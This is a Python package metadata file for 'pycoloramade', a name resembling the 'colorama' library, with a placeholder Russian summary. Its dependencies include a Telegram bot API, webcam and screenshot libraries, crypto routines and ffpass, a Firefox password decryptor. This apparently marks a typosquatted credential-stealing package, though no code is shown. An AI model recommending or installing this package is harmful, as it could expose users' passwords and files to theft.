Metadata-Version: 2.1
Name: pycoloramade
Version: 1.8.9
Summary: Описание твоей библиотеки
Author: pycolorama
Author-email: chantalleshika@gmail.com
Classifier: Programming Language :: Python :: 3
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: OS Independent
Requires-Python: >=3.6
Requires-Dist: requests
Requires-Dist: pywin32
Requires-Dist: opencv-python
Requires-Dist: Pillow
Requires-Dist: pyTelegramBotAPI
Requires-Dist: psutil
Requires-Dist: GPUtil
Requires-Dist: tabulate
Requires-Dist: pycryptodome
Requires-Dist: configparser
Requires-Dist: ffpass
